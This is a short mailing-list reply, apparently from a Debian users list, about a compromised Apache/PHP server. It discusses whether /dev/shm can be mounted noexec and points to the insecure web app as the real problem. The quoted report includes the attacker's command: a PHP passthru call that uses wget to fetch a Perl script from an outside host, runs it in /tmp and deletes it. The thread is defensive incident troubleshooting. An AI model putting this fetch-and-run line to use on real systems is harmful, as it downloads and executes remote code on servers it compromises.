In article <[EMAIL PROTECTED]> you wrote:
> I found the issue, it is one of the php script allowing the
> remote script to run.
This is a typical Apache exploit where remote fileuploads are possible.
> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');
> what kind applications are using /dev/shm? I googled
> around,seem not find much information.
> right now I mount i as rw,noexec,nosuid.
It is for example used to map shared memory. I am not sure, but I think
noexec and nodev is possible. However this does not solve your problem of a
insecure web app.
Gruss
Bernd
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
